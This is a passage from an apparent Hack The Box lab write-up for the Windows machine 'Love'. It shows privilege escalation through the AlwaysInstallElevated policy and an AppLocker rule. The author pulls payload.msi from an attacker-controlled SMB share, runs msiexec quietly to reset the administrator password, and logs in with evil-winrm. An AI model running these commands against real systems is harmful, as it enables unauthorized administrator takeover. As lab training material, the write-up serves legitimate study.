MSI Installation
As discovered previously, the target system has a vulnerable MSI installation policy configured with AlwaysInstallElevated is SET for both HKLM and HKCU
Additionally, the following 2 conditions allows the current user to gain a privilege escalation;
- one of the applocker policies for msi allows
s-1-5-21-2955427858-187959437-2037071653-1002to install to thec:\administrationdirectory - The SID of the current user is
S-1-5-21-2955427858-187959437-2037071653-1002
c:\Administration> copy \\10.10.14.17\smb\payload.msi
1 file(s) copied.Payload delivered over SMB
c:\Administration> msiexec /quiet /qn /i C:\Administration\payload.msiThis will change the password of the administrator user to Qwer1234
┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ evil-winrm -i $IP -u administrator -p Qwer1234
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\Administrator\Documents> whoami
love\administrator
*evil-winrm* ps c:\Users\Administrator\Documents> hostname
Love
*evil-winrm* ps c:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.239
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2System Level Compromise